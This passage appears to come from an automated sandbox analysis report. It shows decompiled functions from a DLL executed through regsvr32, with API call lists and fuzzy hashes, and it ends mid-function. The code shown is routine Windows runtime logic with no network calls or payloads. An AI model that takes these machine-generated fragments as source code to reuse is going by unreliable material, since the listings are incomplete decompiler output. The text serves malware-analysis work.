                                                                                                            				_v20 = E10008325(__ecx);
                                                                                                            				if(( *(__ecx + 0x7c) & 0x00000020) != 0 || _t114 == 0x201 || _t114 == 0x202) {
                                                                                                            					if(_t114 < 0x200 || _t114 > 0x209) {
                                                                                                            						if(_t114 < 0xa0 || _t114 > 0xa9) {
                                                                                                            							goto L30;
                                                                                                            						} else {
                                                                                                            							goto L8;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						L8:
                                                                                                            						_v16 = E100373DB();
                                                                                                            						_t70 = _a4;
                                                                                                            						_v28.y =  *((intOrPtr*)(_t70 + 0x18));
                                                                                                            						_v28.x =  *(_t70 + 0x14);
                                                                                                            						ScreenToClient( *(_t116 + 0x1c),  &_v28);
                                                                                                            						E10011C50( &_v76, 0, 0x30);
                                                                                                            						_v76 = 0x28;
                                                                                                            						_t77 =  *((intOrPtr*)( *_t116 + 0x6c))(_v28.x, _v28.y,  &_v76);
                                                                                                            						_t128 = _v40 - 0xffffffff;
                                                                                                            						_v8 = _t77;
                                                                                                            						if(_v40 != 0xffffffff) {
                                                                                                            							_push(_v40);
                                                                                                            							E100107C8(0x201, _t114, _t116, _t128);
                                                                                                            						}
                                                                                                            						if(_t114 != 0x201 || (_v69 & 0x00000080) == 0) {
                                                                                                            							_v12 = _v12 & 0x00000000;
                                                                                                            							__eflags = _t114 - 0x201;
                                                                                                            							if(_t114 != 0x201) {
                                                                                                            								_t90 = GetKeyState(1);
                                                                                                            								__eflags = _t90;
                                                                                                            								if(_t90 < 0) {
                                                                                                            									_v8 =  *((intOrPtr*)(_v16 + 0x78));
                                                                                                            								}
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_v12 = 1;
                                                                                                            						}
                                                                                                            						if(_v8 < 0 || _v12 != 0) {
                                                                                                            							_t78 = GetKeyState(1);
                                                                                                            							__eflags = _t78;
                                                                                                            							if(_t78 >= 0) {
                                                                                                            								L28:
                                                                                                            								 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
                                                                                                            								KillTimer( *(_t116 + 0x1c), 0xe001);
                                                                                                            								goto L29;
                                                                                                            							}
                                                                                                            							__eflags = _v12;
                                                                                                            							if(_v12 == 0) {
                                                                                                            								goto L29;
                                                                                                            							}
                                                                                                            							goto L28;
                                                                                                            						} else {
                                                                                                            							if(_t114 != 0x202) {
                                                                                                            								__eflags =  *(_t116 + 0x78) & 0x00000008;
                                                                                                            								if(( *(_t116 + 0x78) & 0x00000008) != 0) {
                                                                                                            									L25:
                                                                                                            									 *((intOrPtr*)( *_t116 + 0x160))(_v8);
                                                                                                            									L29:
                                                                                                            									 *((intOrPtr*)(_v16 + 0x78)) = _v8;
                                                                                                            									goto L30;
                                                                                                            								}
                                                                                                            								_t85 = GetKeyState(1);
                                                                                                            								__eflags = _t85;
                                                                                                            								if(_t85 < 0) {
                                                                                                            									goto L25;
                                                                                                            								}
                                                                                                            								_t109 = _v16;
                                                                                                            								__eflags = _v8 -  *((intOrPtr*)(_t109 + 0x78));
                                                                                                            								if(_v8 ==  *((intOrPtr*)(_t109 + 0x78))) {
                                                                                                            									goto L29;
                                                                                                            								}
                                                                                                            								_push(0x12c);
                                                                                                            								_push(0xe000);
                                                                                                            								L24:
                                                                                                            								E1002F4CC(_t116);
                                                                                                            								goto L29;
                                                                                                            							}
                                                                                                            							 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
                                                                                                            							_push(0xc8);
                                                                                                            							_push(0xe001);
                                                                                                            							goto L24;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L30:
                                                                                                            					_t62 = E10022AD5(_t116);
                                                                                                            					if(_t62 == 0 ||  *((intOrPtr*)(_t62 + 0x64)) == 0) {
                                                                                                            						if(_v20 == 0) {
                                                                                                            							L35:
                                                                                                            							if(IsWindow( *(_t116 + 0x1c)) == 0) {
                                                                                                            								goto L38;
                                                                                                            							}
                                                                                                            							return E10021527(_a4);
                                                                                                            						} else {
                                                                                                            							goto L33;
                                                                                                            						}
                                                                                                            						while(1) {
                                                                                                            							L33:
                                                                                                            							_t115 = _v20;
                                                                                                            							_push(_a4);
                                                                                                            							if( *((intOrPtr*)( *_v20 + 0x100))() != 0) {
                                                                                                            								goto L37;
                                                                                                            							}
                                                                                                            							_t68 = E10022A96(_t115);
                                                                                                            							_v20 = _t68;
                                                                                                            							if(_t68 != 0) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							goto L35;
                                                                                                            						}
                                                                                                            						goto L37;
                                                                                                            					} else {
                                                                                                            						L38:
                                                                                                            						__eflags = 0;
                                                                                                            						return 0;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}


























                                                                                                            APIs
                                                                                                              • Part of subcall function 10008325: GetParent.USER32(?), ref: 1000832F
                                                                                                            • ScreenToClient.USER32 ref: 1002FEA5
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002FF02
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002FF4A
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002FF84
                                                                                                            • KillTimer.USER32(?,0000E001), ref: 1002FFA9
                                                                                                            • IsWindow.USER32(?), ref: 1002FFF5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: State$ClientKillParentScreenTimerWindow
                                                                                                            • String ID: (
                                                                                                            • API String ID: 1540673551-3887548279
                                                                                                            • Opcode ID: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                                                            • Instruction ID: 52046703db0e3be90f8dc11269cbd7e61114aefd04d05f62ac3939d045805729
                                                                                                            • Opcode Fuzzy Hash: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                                                            • Instruction Fuzzy Hash: E4519E35A00249DFDB51DFA4D988BADBBF1EF48390F51007DE915AB2E2D7709A81CB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 63%
                                                                                                            			E10032A2D(void* __ecx, signed int _a4, long _a8) {
                                                                                                            				struct HWND__* _v8;
                                                                                                            				long _t24;
                                                                                                            				void* _t29;
                                                                                                            				int _t32;
                                                                                                            				struct HWND__* _t36;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t29 = __ecx;
                                                                                                            				if(GetKeyState(0x11) < 0) {
                                                                                                            					_push(8);
                                                                                                            					_pop(0);
                                                                                                            				}
                                                                                                            				if(GetKeyState(0x10) < 0) {
                                                                                                            					_push(4);
                                                                                                            					_pop(0);
                                                                                                            				}
                                                                                                            				_t36 = GetFocus();
                                                                                                            				_v8 = GetDesktopWindow();
                                                                                                            				if(_t36 != 0) {
                                                                                                            					_t32 = _a4 << 0x10;
                                                                                                            					do {
                                                                                                            						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
                                                                                                            						_t36 = GetParent(_t36);
                                                                                                            					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
                                                                                                            				} else {
                                                                                                            					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
                                                                                                            				}
                                                                                                            				return _t24;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendState$DesktopFocusParentWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 4150626516-0
                                                                                                            • Opcode ID: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                                                            • Instruction ID: b978b154d262d257bd1bf3691abd3912275a9b299a299c021808da74b3d9ae9a
                                                                                                            • Opcode Fuzzy Hash: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                                                            • Instruction Fuzzy Hash: BD11CA32A00B39BFE7629BA68C84E593B98EB44792F114425FE41DF141D6B0EC41D7B1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E10010839(void* __ecx, void* __eflags) {
                                                                                                            				void* _v8;
                                                                                                            				long _v12;
                                                                                                            				long _v16;
                                                                                                            				signed char _v23;
                                                                                                            				struct _MEMORY_BASIC_INFORMATION _v44;
                                                                                                            				struct _SYSTEM_INFO _v80;
                                                                                                            				void* _v92;
                                                                                                            				void* _t29;
                                                                                                            				int _t33;
                                                                                                            				intOrPtr _t35;
                                                                                                            				void* _t43;
                                                                                                            				void* _t46;
                                                                                                            				signed int _t49;
                                                                                                            				void* _t54;
                                                                                                            				void* _t55;
                                                                                                            				void* _t62;
                                                                                                            				void* _t63;
                                                                                                            
                                                                                                            				_t29 = 4;
                                                                                                            				E10010B20(_t29, __ecx);
                                                                                                            				_t55 = _t63;
                                                                                                            				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
                                                                                                            					L9:
                                                                                                            					_t33 = 0;
                                                                                                            				} else {
                                                                                                            					_t46 = _v44.AllocationBase;
                                                                                                            					GetSystemInfo( &_v80);
                                                                                                            					_t49 = _v80.dwPageSize;
                                                                                                            					_t35 =  *0x1004f3e0; // 0x2
                                                                                                            					_t54 = ( !(_t49 - 1) & _t55) - _t49;
                                                                                                            					asm("sbb esi, esi");
                                                                                                            					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
                                                                                                            					_v12 = _t49;
                                                                                                            					if(_t54 < _t62) {
                                                                                                            						goto L9;
                                                                                                            					} else {
                                                                                                            						if(_t35 == 1) {
                                                                                                            							_v8 = _t54;
                                                                                                            							goto L14;
                                                                                                            						} else {
                                                                                                            							_v8 = _t46;
                                                                                                            							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
                                                                                                            								_v8 = _v8 + _v44.RegionSize;
                                                                                                            								if((_v44.State & 0x00001000) == 0) {
                                                                                                            									continue;
                                                                                                            								} else {
                                                                                                            									_t43 = _v44.BaseAddress;
                                                                                                            									_v8 = _t43;
                                                                                                            									if((_v23 & 0x00000001) == 0) {
                                                                                                            										if(_t54 >= _t43) {
                                                                                                            											if(_t43 < _t62) {
                                                                                                            												_v8 = _t62;
                                                                                                            											}
                                                                                                            											VirtualAlloc(_v8, _v12, 0x1000, 4);
                                                                                                            											_t35 =  *0x1004f3e0; // 0x2
                                                                                                            											L14:
                                                                                                            											asm("sbb eax, eax");
                                                                                                            											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
                                                                                                            										} else {
                                                                                                            											goto L9;
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										_t33 = 1;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L15;
                                                                                                            							}
                                                                                                            							goto L9;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L15:
                                                                                                            				return _t33;
                                                                                                            			}





















                                                                                                            APIs
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 10010853
                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10010864
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 100108AA
                                                                                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 100108E8
                                                                                                            • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 1001090E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 4136887677-0
                                                                                                            • Opcode ID: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                                                            • Instruction ID: ea62dba494344a01c7efc91e140871f3e8746f8623a2ca282db0dc9e1cf87e08
                                                                                                            • Opcode Fuzzy Hash: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                                                            • Instruction Fuzzy Hash: 60316D32E0425DEBEF10CBA8CD85AED7BB8EB05355F110165F981EB191DBB09A809B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E10025CEC(void* __ecx, void* __eflags) {
                                                                                                            				intOrPtr* _t21;
                                                                                                            				void* _t25;
                                                                                                            				struct HINSTANCE__* _t26;
                                                                                                            				_Unknown_base(*)()* _t30;
                                                                                                            				void* _t39;
                                                                                                            				CHAR* _t40;
                                                                                                            				void* _t42;
                                                                                                            				signed int* _t43;
                                                                                                            				void* _t44;
                                                                                                            				void* _t46;
                                                                                                            
                                                                                                            				E10011BF0(0x1003acec, _t46);
                                                                                                            				_t43 =  *(_t46 + 0x10);
                                                                                                            				 *_t43 =  *_t43 & 0x00000000;
                                                                                                            				E10025C6A(_t46 - 0x10,  *((intOrPtr*)(_t46 + 8)));
                                                                                                            				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                                                                                            				_t21 = E100243B2();
                                                                                                            				_t38 =  *_t21;
                                                                                                            				 *(_t46 + 0x10) =  *((intOrPtr*)( *_t21 + 0xc))(_t39, _t42, __ecx) + 0x10;
                                                                                                            				 *(_t46 - 4) = 1;
                                                                                                            				_t25 = E1002583A( *((intOrPtr*)(_t46 - 0x10)), _t46 + 0x10);
                                                                                                            				_t40 =  *(_t46 + 0x10);
                                                                                                            				if(_t25 != 0) {
                                                                                                            					_t26 = LoadLibraryA(_t40);
                                                                                                            					if(_t26 == 0) {
                                                                                                            						goto L1;
                                                                                                            					}
                                                                                                            					_t30 = GetProcAddress(_t26, "DllGetClassObject");
                                                                                                            					if(_t30 == 0) {
                                                                                                            						_t44 = 0x800401f9;
                                                                                                            					} else {
                                                                                                            						_t44 =  *_t30( *((intOrPtr*)(_t46 + 8)),  *((intOrPtr*)(_t46 + 0xc)), _t43);
                                                                                                            					}
                                                                                                            					L6:
                                                                                                            					E100014B0(_t40 - 0x10, _t38);
                                                                                                            					E100014B0( *((intOrPtr*)(_t46 - 0x10)) + 0xfffffff0, _t38);
                                                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
                                                                                                            					return _t44;
                                                                                                            				}
                                                                                                            				L1:
                                                                                                            				_t44 = 0x80040154;
                                                                                                            				goto L6;
                                                                                                            			}














                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10025CF1
                                                                                                              • Part of subcall function 10025C6A: wsprintfA.USER32 ref: 10025CC5
                                                                                                              • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                                                              • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                                                              • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                                                              • Part of subcall function 1002583A: RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                                                              • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                                                              • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                                                              • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,10025DBC,?,100430A8,00000000), ref: 10025D40
                                                                                                            • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 10025D50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen$AddressH_prologLibraryLoadProcQueryValuewsprintf
                                                                                                            • String ID: DllGetClassObject
                                                                                                            • API String ID: 821125782-1075368562
                                                                                                            • Opcode ID: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                                                            • Instruction ID: 4c2bc5ab8f47dce9d6dfca02a5288212b81b2082d3bc100dcb553b8fe7e2210e
                                                                                                            • Opcode Fuzzy Hash: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                                                            • Instruction Fuzzy Hash: CB11BC3260021AAFDB11DFA4DC08BAF77B8FF00356F044969F812E7261DB34E9018BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E100348C4(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4, char _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v284;
                                                                                                            				intOrPtr _t10;
                                                                                                            				void* _t15;
                                                                                                            				void* _t19;
                                                                                                            				void* _t20;
                                                                                                            				void* _t22;
                                                                                                            
                                                                                                            				_t22 = __esi;
                                                                                                            				_t20 = __ecx;
                                                                                                            				_t19 = __ebx;
                                                                                                            				_t27 = _a8 - 0x800;
                                                                                                            				_t10 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_v8 = _t10;
                                                                                                            				if(_a8 != 0x800) {
                                                                                                            					__eflags = GetLocaleInfoA(_a8, 3,  &_a8, 4);
                                                                                                            					if(__eflags != 0) {
                                                                                                            						goto L2;
                                                                                                            					} else {
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					lstrcpyA( &_a8, "LOC");
                                                                                                            					L2:
                                                                                                            					_push(_t22);
                                                                                                            					_t15 = E10011D44(_t19, _t20, _t27,  &_v284, 0x112, _a4,  &_a8);
                                                                                                            					if(_t15 == 0xffffffff || _t15 >= 0x112) {
                                                                                                            						_t12 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            					} else {
                                                                                                            						_t12 = LoadLibraryA( &_v284);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E100117AE(_t12, _v8);
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • lstrcpyA.KERNEL32(00000800,LOC), ref: 100348E7
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 1003491A
                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 1003492A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLibraryLoadLocalelstrcpy
                                                                                                            • String ID: LOC
                                                                                                            • API String ID: 864663389-519433814
                                                                                                            • Opcode ID: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                                                            • Instruction ID: 1b661f8c901bfcf78996fae171bebb1d1a637ee772a53719b66f99f2a01cec23
                                                                                                            • Opcode Fuzzy Hash: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                                                            • Instruction Fuzzy Hash: 6C018B3990111CAFEB62DFA0DC49EDE37ACEB00326F018562FA15DE190DB30EA448B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 79%
                                                                                                            			E10007AE5(struct HWND__* _a4, signed int _a8) {
                                                                                                            				struct _WINDOWPLACEMENT _v48;
                                                                                                            				int _t16;
                                                                                                            
                                                                                                            				if(E1000799F() == 0) {
                                                                                                            					if((_a8 & 0x00000003) == 0) {
                                                                                                            						if(IsIconic(_a4) == 0) {
                                                                                                            							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
                                                                                                            						} else {
                                                                                                            							_t16 = GetWindowPlacement(_a4,  &_v48);
                                                                                                            						}
                                                                                                            						if(_t16 == 0) {
                                                                                                            							return 0;
                                                                                                            						} else {
                                                                                                            							return E10007A99( &(_v48.rcNormalPosition), _a8);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					return 0x12340042;
                                                                                                            				}
                                                                                                            				return  *0x1004edfc(_a4, _a8);
                                                                                                            			}






                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 83ae4de29b23ff51b0e8bec05b4b5c9f8fcd8e6cb892886513852504e8bddb0b
                                                                                                            • Instruction ID: 3a21d875c7eeece48a0e685930edcd66bc13eb96913376d54ee1399e2fea6754
                                                                                                            • Opcode Fuzzy Hash: 83ae4de29b23ff51b0e8bec05b4b5c9f8fcd8e6cb892886513852504e8bddb0b
                                                                                                            • Instruction Fuzzy Hash: DFF0C935A04119ABEB02EF61CC49EAE7FA9FB042C4B408025FD1AD506ADB38DA559B61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10001090() {
                                                                                                            				char _v8;
                                                                                                            				char _t12;
                                                                                                            				intOrPtr* _t16;
                                                                                                            				signed int _t18;
                                                                                                            
                                                                                                            				_t18 = 0;
                                                                                                            				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v8, 7) == 0) {
                                                                                                            					L5:
                                                                                                            					return GetACP();
                                                                                                            				} else {
                                                                                                            					_t12 = _v8;
                                                                                                            					_t16 =  &_v8;
                                                                                                            					if(_t12 == 0) {
                                                                                                            						goto L5;
                                                                                                            					} else {
                                                                                                            						do {
                                                                                                            							_t16 = _t16 + 1;
                                                                                                            							_t18 = _t12 + (_t18 + _t18 * 4) * 2 - 0x30;
                                                                                                            							_t12 =  *_t16;
                                                                                                            						} while (_t12 != 0);
                                                                                                            						if(_t18 != 0) {
                                                                                                            							return _t18;
                                                                                                            						} else {
                                                                                                            							goto L5;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • GetThreadLocale.KERNEL32 ref: 10001096
                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00001004,00000007,00000007), ref: 100010A9
                                                                                                            • GetACP.KERNEL32 ref: 100010D5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Locale$InfoThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 4232894706-0
                                                                                                            • Opcode ID: e87460b6ede7ecce593e36227f27ce69e25290a2edb96822d484cbb01d0533fa
                                                                                                            • Instruction ID: 26a1fdc9c2cb66cfcd8947c1f0583feeb1697c74baf4304ef7dc7fad7aa6cfc5
                                                                                                            • Opcode Fuzzy Hash: e87460b6ede7ecce593e36227f27ce69e25290a2edb96822d484cbb01d0533fa
                                                                                                            • Instruction Fuzzy Hash: 3BF0E2366002B09AEE02DF61EC44ADB3BA4EF04BC1F814548EDC59B105E660AA0AC7E2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 67%
                                                                                                            			E1000DB7F(signed int* __ecx) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				intOrPtr _t240;
                                                                                                            				intOrPtr* _t241;
                                                                                                            				signed int _t249;
                                                                                                            				signed int _t253;
                                                                                                            				signed int _t254;
                                                                                                            				signed int _t260;
                                                                                                            				signed int _t263;
                                                                                                            				signed int _t267;
                                                                                                            				void* _t272;
                                                                                                            				void* _t274;
                                                                                                            				signed int _t276;
                                                                                                            				void* _t278;
                                                                                                            				signed int _t281;
                                                                                                            				void* _t304;
                                                                                                            				intOrPtr* _t311;
                                                                                                            				signed int _t312;
                                                                                                            				signed int _t313;
                                                                                                            				signed int _t314;
                                                                                                            				signed int _t315;
                                                                                                            				void* _t319;
                                                                                                            				signed int* _t320;
                                                                                                            				intOrPtr _t342;
                                                                                                            				signed int _t346;
                                                                                                            				signed int _t359;
                                                                                                            				signed int _t390;
                                                                                                            				signed int _t392;
                                                                                                            				signed int _t396;
                                                                                                            				void* _t402;
                                                                                                            				signed int _t405;
                                                                                                            				signed int _t408;
                                                                                                            				signed int _t410;
                                                                                                            				signed int _t414;
                                                                                                            				void* _t416;
                                                                                                            				signed int _t418;
                                                                                                            				signed int _t422;
                                                                                                            				void* _t423;
                                                                                                            				signed int _t427;
                                                                                                            				signed int _t430;
                                                                                                            				void* _t432;
                                                                                                            				void* _t434;
                                                                                                            				intOrPtr _t435;
                                                                                                            				signed int _t439;
                                                                                                            
                                                                                                            				E10011BF0(0x1003af23, _t432);
                                                                                                            				_t435 = _t434 - 0x54;
                                                                                                            				_t240 =  *0x1004c470; // 0xf3933a06
                                                                                                            				 *(_t432 - 0x3c) =  *(_t432 - 0x3c) & 0x00000000;
                                                                                                            				asm("movsd");
                                                                                                            				asm("movsd");
                                                                                                            				asm("movsd");
